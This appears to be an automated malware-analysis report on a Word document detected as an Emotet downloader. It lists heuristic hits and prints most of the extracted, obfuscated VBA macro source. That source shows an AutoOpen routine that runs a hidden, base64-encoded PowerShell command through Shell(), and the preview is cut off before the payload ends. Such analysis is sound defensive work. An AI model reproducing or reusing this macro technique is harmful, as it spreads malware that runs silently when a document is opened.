Verdict: MALICIOUS

Risk score: 242
Heuristics (7)

- ClamAV: Doc.Downloader.Emotet-7012579-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-7012579-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13268 bytes | 367685e79fd368abc0edc92f3373ab4e17f029cdb5d1a81b79c63aeb419c8269 |
Preview script: first 1,000 lines of the extracted script (macros.bas). The source is shown as extracted, with one statement per line; the preview ends where the analyzer truncated it.

```vb
Attribute VB_Name = "uidtZjtuEvuHL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function UGPrUi()
On Error Resume Next
LIZJT = fszSMs - Cos(UiYKt) * 1 - Chr(53999) / 62881 - ChrB(rmmir)
MTjht = 2817
zCaMh = rrDCMV - Cos(zaGFBF) * 1 - Chr(38728) / 15561 - ChrB(WnbbV)
ZTlSq = 26524
UGPrUi = uWhHqd + ItBRskvULqu + QjAHmSzhT + hWTvlJKk + AdUFLjSvUOM + CfDBBA + lMHquMnhC
jwwMu = UokZMA - Cos(lMbfo) * 1 - Chr(64088) / 84807 - ChrB(fnkFMX)
kQtid = 54228
End Function
Sub Autoopen()
On Error Resume Next
IGpLin = mNObFh - Cos(sFiJV) * 1 - Chr(87583) / 2737 - ChrB(NGhRC)
TfiWn = 83927
NVBBswfbQK (UGPrUi)
UpdCE = sZWiHq - Cos(sLPVI) * 1 - Chr(66644) / 85756 - ChrB(tjdNka)
ijERq = 17022
End Sub
Function NVBBswfbQK(UvKjoI)
On Error Resume Next
QAGRu = krbZb - Cos(MIPMOF) * 1 - Chr(98171) / 11822 - ChrB(GzpTYZ)
pZqzwU = 90035
OrokN = HEmnO - Cos(STqLr) * 1 - Chr(5206) / 92892 - ChrB(ARzWi)
CBibBr = 25398
zjdzjSIuw = Shell(TKAuaZDAG + Chr(vbKeyP) + JIXsVtFRbT + UvKjoI, vbHide)
wWROt = wvCjJ - Cos(YVjiI) * 1 - Chr(87339) / 46824 - ChrB(OwtRBT)
FVKlXw = 34298
End Function

Attribute VB_Name = "TucJWLFOQM"
Function uWhHqd()
On Error Resume Next
DBCoP = InFaz - Cos(OANld) * 1 - Chr(57892) / 49672 - ChrB(ljswwo)
ELFAHZ = 73196
wBmzXzVMw = "owersHe" + "LL -Wi" + "nDowsTyle hi" + "dden -" + "e KAAo" + "ACgAIgB" + "7ADIAMwB9AHsAO" + "AAxAH0"
dJVMi = Omwvp - Cos(CXdOD) * 1 - Chr(43325) / 21856 - ChrB(WIFrb)
DbAap = 58032
liGVOj = "AewA1" + "ADcAfQB7A" + "DMANQB" + "9AHsANQA" + "1AH0Aew" + "AxADEAfQB" + "7ADEANQB9AHsA" + "NQAxAH0A"
cjcHRv = WuvBH - Cos(kjirw) * 1 - Chr(70447) / 26351 - ChrB(BVDik)
VmmVF = 22280
iznwjErNf = "ewA4ADAAfQB" + "7ADEANgB" + "9AHsAM" + "gAyAH0Ae" + "wA2ADkAfQB7ADQ" + "AMwB9AHsAN" + "gA3AH0AewA1ADYA" + "fQB7ADYA"
aoAGlb = CcMEk - Cos(jWtIi) * 1 - Chr(10166) / 31688 - ChrB(aOYdh)
ljIavv = 56194
UtAKsVsD = "NgB9AHsANQA0AH" + "0AewA" + "xADcA" + "fQB7ADQANwB9AHs" + "AMwA4AH0AewA" + "4AH0AewAxADkAf"
shkKJ = KYIzu - Cos(awtdrA) * 1 - Chr(90592) / 53468 - ChrB(ZcdEqT)
UmIod = 50198
zmkCBU = "QB7ADIANQB" + "9AHsAMw" + "AzAH0AewAyA" + "DgAfQB7ADIANwB9" + "AHsAMQB9AHsANwB" + "9AHsANAAwAH0A" + "ewAzAH0AewA2"
LYUvHF = GZjDK - Cos(qfivAB) * 1 - Chr(20145) / 37591 - ChrB(HFTpr)
VqFzA = 40278
PwQEw = "ADIAfQB7ADMAM" + "gB9AHsANgA1" + "AH0AewA0ADIAfQB" + "7ADkAfQB7" + "ADcAMgB9AHsANw" + "A4AH0AewAzADEA"
EXEnWw = DuAfh - Cos(pDNocP) * 1 - Chr(19582) / 12698 - ChrB(OcSOw)
idEJRI = 50553
izTSthQlGLV = "fQB7ADEAMA" + "B9AHsAOAA1AH0Ae" + "wA1ADMAfQB7A" + "DcAMAB9AHsAOAA0"
qNfNA = NEnIO - Cos(SdRXk) * 1 - Chr(20702) / 51673 - ChrB(IcVIwi)
QwVPT = 28737
NUjnKwBp = "AH0AewAy" + "ADEAfQB" + "7ADcANQB9AH" + "sANwA5" + "AH0AewA4ADYA"
XbzCJE = JoKzj - Cos(EMjZG) * 1 - Chr(65391) / 73684 - ChrB(NrWOR)
wHSsvA = 50228
KLWdv = "fQB7A" + "DQANgB9AHsAM" + "wA2AH0AewA2" + "ADAAfQB7ADgAM" + "gB9AHsA" + "MwA5AH0Ae" + "wAwAH0A" + "ewAxAD" + "gAfQB7"
qZiBW = wnKIPQ - Cos(EQwIl) * 1 - Chr(55053) / 78182 - ChrB(janrW)
CWREi = 85249
zZXuvFFTR = "ADUAMAB9AHsAMg" + "A0AH0AewA" + "4ADMAf" + "QB7ADcAMQB9AHsA" + "MQAzAH0AewA3ADQ"
uWhHqd = wBmzXzVMw + liGVOj + iznwjErNf + UtAKsVsD + zmkCBU + PwQEw + izTSthQlGLV + NUjnKwBp + KLWdv + zZXuvFFTR
End Function
Function ItBRskvULqu()
On Error Resume Next
VGqFLB = ahOwB - Cos(srVjJ) * 1 - Chr(45119) / 72045 - ChrB(HzvJzd)
RtEjXR = 65785
SjVuH = "AfQB7ADYANAB" + "9AHsANA" + "A1AH0AewA" + "0ADEAfQB7ADMANA" + "B9AHsANAA0AH" + "0AewA1ADgAfQB7" + "ADUAfQB7ADIA" + "OQB9AHs" + "ANQA5AH0AewA1A"
GCaaj = BMoqFO - Cos(AhuLG) * 1 - Chr(4770) / 28395 - ChrB(vwLYI)
oJSdA = 20072
jmzqaohFc = "DIAfQ" + "B7ADEAMgB9AH" + "sANAB9AHsA" + "NgAzAH0Ae" + "wA2ADEA"
PhjwBN = nGSuP - Cos(QLJVQO) * 1 - Chr(37396) / 4326 - ChrB(GOCba)
CWMFD = 55583
VwsSmibAB = "fQB7AD" + "YAOAB9AHsANAA" + "4AH0AewA3ADM" + "AfQB7A" + "DMAMAB9AHsAMg" + "A2AH0AewAyADA" + "AfQB7A" + "DcANgB9AHsAMg ... (truncated)
```